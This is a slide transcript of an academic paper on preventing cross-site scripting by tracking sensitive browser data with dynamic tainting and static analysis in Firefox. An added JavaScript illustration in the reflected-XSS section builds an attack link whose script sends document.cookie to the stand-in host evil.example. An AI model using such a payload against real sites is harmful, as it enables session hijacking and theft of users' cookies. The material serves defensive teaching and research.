Cross-Site Scripting Prevention with Dynamic Tainting and Static Analysis

By Philipp Vogt, Florian Nentwich, Nenad Jovanovic, Engin Kirda, Christopher Kruegel, and Giovanni Vigna
Network and Distributed System Security (NDSS '07)

Transcript of the slides

Page 1: Title slide (title, authors, and venue as above)

Page 2: Authors

Philipp Vogt: main developer of the XSS Attack Prevention in Firefox project; cross-site scripting detection.

Giovanni Vigna: Associate Professor at UCSB; web security, intrusion detection.

Page 3: Introduction [1/5]

Cross Site Scripting: an attack against web applications in which malicious scripting code is injected into the output of the application, which is then delivered to a user's web browser. This scripting code transfers sensitive information to the attacker, and that information allows the attacker to impersonate the victim or hijack the victim's session.

Page 4: Introduction [2/5]

Cross Site Scripting: attack flow between Attacker, Server, and Victim

1. The attacker sends the victim an email containing the XSS code (a link).
2. The victim sends a request containing the XSS code to the server.
3. The server sends back a response containing the XSS code.
4. The XSS code is executed in the victim's browser.
5. Sensitive information is transferred to the attacker.

Page 5: Introduction [3/5]

Stored XSS: the attacker persistently stores the malicious code in a resource managed by the web application, such as a database. The actual attack is carried out at a later time, when the victim requests a dynamic page that includes the stored code.

Reflected XSS: the attack script is not persistently stored; instead, it is reflected (sent back) to the victim. Example: sending the victim an email with a link that contains the malicious JavaScript code.
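As an added illustration of the reflected case (example code, not from the slides or the authors' project): a search handler that reflects the query parameter into HTML, beside the same handler with output escaping, and a constructed attack link whose payload exfiltrates document.cookie through an image source. The hosts shop.example and evil.example, the handler and the markup are assumptions of the example.

```javascript
// Added example, not from the slides: a search handler that reflects the
// query parameter into HTML, and the same handler with output escaping.
// Hosts shop.example / evil.example and the page markup are constructed.

// Vulnerable: untrusted input is concatenated straight into the markup.
function renderUnsafe(query) {
  return `<p>No results for: ${query}</p>`;
}

// Hardened: HTML-escape the value so the browser treats it as text, not markup.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}
function renderSafe(query) {
  return `<p>No results for: ${escapeHtml(query)}</p>`;
}

// Constructed attack link, as it would be mailed to the victim. The payload
// exfiltrates document.cookie by setting an image source on the attacker's host,
// one of the transmission channels the paper's browser modification checks.
const payload =
  '<script>new Image().src="https://evil.example/c?" + encodeURIComponent(document.cookie)</script>';
const attackUrl = 'https://shop.example/search?q=' + encodeURIComponent(payload);

// What the server sees after the victim clicks: the decoded query parameter.
function queryFromUrl(url) {
  return new URL(url).searchParams.get('q');
}

// True if the rendered page contains an executable script element.
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Usage: the reflected payload executes in the unsafe page and is inert text in the safe one.
const q = queryFromUrl(attackUrl);
console.log('unsafe executes script:', containsScriptTag(renderUnsafe(q))); // true
console.log('safe executes script:  ', containsScriptTag(renderSafe(q)));   // false
```

The escaping fix is the server-side counterpart of what the paper does in the browser: the server stops the script from ever being reflected, whereas the modified browser lets the script run but blocks the cookie from leaving the origin.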

Page 6: Introduction [4/5]

Sensitive Data Sources

Page 7: Introduction [5/5]

The Goal: a JavaScript program may send sensitive information only to the site from which it was loaded. To enforce this, the information flow of sensitive data is tracked inside the JavaScript engine of the browser. Whenever an attack is detected, the user is warned and given the possibility to stop the transfer.

Page 8: Dynamic Tainting [1/5]

Dynamic Tainting: sensitive data is first marked (tainted); then, whenever this data is accessed by scripts running in the web browser, its use is dynamically tracked by the system. It is sufficient to model the taint value associated with a piece of data as a simple boolean flag.

Page 9: Dynamic Tainting [2/5]

Taint Propagation

- Assignments
- Arithmetic and logic operations (+, -, &, etc.)
- Control structures and loops (if, while, switch, for in)
- Function calls and eval

Page 10: Static Tainting [1/3]

Indirect Control Dependency

Dynamic tainting only observes the path that is actually executed: a variable that is assigned in a branch that is not taken stays untainted, even though its final value depends on the tainted condition. To cover both direct and indirect control dependencies, all possible program paths in a scope need to be examined, so static analysis is necessary.

Page 11: Static Tainting [2/3]

Linear Static Taint Analysis: ensure that all variables that are assigned values (tainted or not) anywhere inside the tainted scope are also tainted.

Page 12: Static Tainting [3/3]

Stack Analysis

Because the JavaScript engine executes stack-based bytecode, the instructions responsible for setting object properties do not name the target object: it is taken from the operand stack. The static analysis therefore tracks an abstract stack whose entries are boolean taint values, so that it can tell which object a property store affects.

Page 13: Data Transmission

To be useful to an attacker, the tainted data has to be transferred to a third party. A variety of methods can be used for this:

- setting document.location
- setting the source of an image in the web page
- submitting a form in the web page
- using the XMLHttpRequest object

Page 14: Evaluation [1/4]

XSS attacks: the system was tested on XSS sources collected by the group's members and was successful in detecting the XSS attacks.

Manual test: the modified browser was used by the authors for web surfing on a daily basis. The overhead is negligible and the number of false positives was low.

Page 15: Evaluation [2/4]

Automatic test: a web crawling engine was integrated into the modified Firefox. It visited 1,033,000 unique web pages; 88,589 (8.58%) of them raised an XSS warning. The scripts that triggered these warnings are inserted into the web page with the consent of the web site owner.

Page 16: Evaluation [3/4]

Top 30 destination domains: these domains belong to companies that collect statistics about traffic on the web sites of their customers. Excluding the top 30 domains reduces the number of warnings to 13,964 (1.35%). It is reduced further to 5,289 (0.51%) if only transfers of cookies are considered.

Page 17: Evaluation [4/4]

Reasons for the small number of remaining false positives:

- Transfer of cookies to a different domain, but within company borders (e.g. cnn.net -> cnn.com)
- Transfer of cookies between different domains of the same company (e.g. discover.com -> unitedstreaming.com)
- The conservative handling of indirect control flow (every variable assigned inside a tainted scope is tainted, whether or not it actually carries sensitive data)

Page 18: Conclusion

- Prevents XSS attacks using dynamic taint analysis, with static analysis when necessary.
- The solution is integrated into the Firefox web browser by modifying its JavaScript engine.
- Produces few false positives and is feasible in practice.

Page 19: Extra - Dynamic Tainting [3/5]

Assignments: if the right-hand side of the assignment is tainted, then the target on the left-hand side is also tainted, e.g. x = document.cookie; The variable that is assigned a tainted value is not the only object that must be tainted.

Arithmetic and Logic Operations: the JavaScript engine executes stack-based bytecode. The operands are first popped from the stack, and the result is pushed back. The result is tainted if one of the operands used is tainted.

Page 20: Extra - Dynamic Tainting [4/5]

Control Structures and Loops: if the condition of a control structure tests a tainted value, a tainted scope is generated that covers the whole control structure. A variable is dynamically tainted only when its value is modified inside such a scope during the actual execution of the program.

Function Calls: if a function is defined in a tainted scope, the function itself (operations, parameters, return value) is also tainted.

Eval: if eval is called in a tainted scope, or if its parameter is tainted, a tainted scope is generated for the evaluated code.

Page 21: Extra - Dynamic Tainting [5/5]

Example

Page 22: Extra - Implementation

Extends Mozilla Firefox 1.0pre. Two parts of the browser hold tainted data objects:

- The JavaScript engine (SpiderMonkey): variables, functions, scopes, and objects
- The DOM tree: location.href, etc.

Every time a JavaScript program attempts to transfer sensitive data, a check is performed to determine whether the sensitive data is being sent to the program's own host.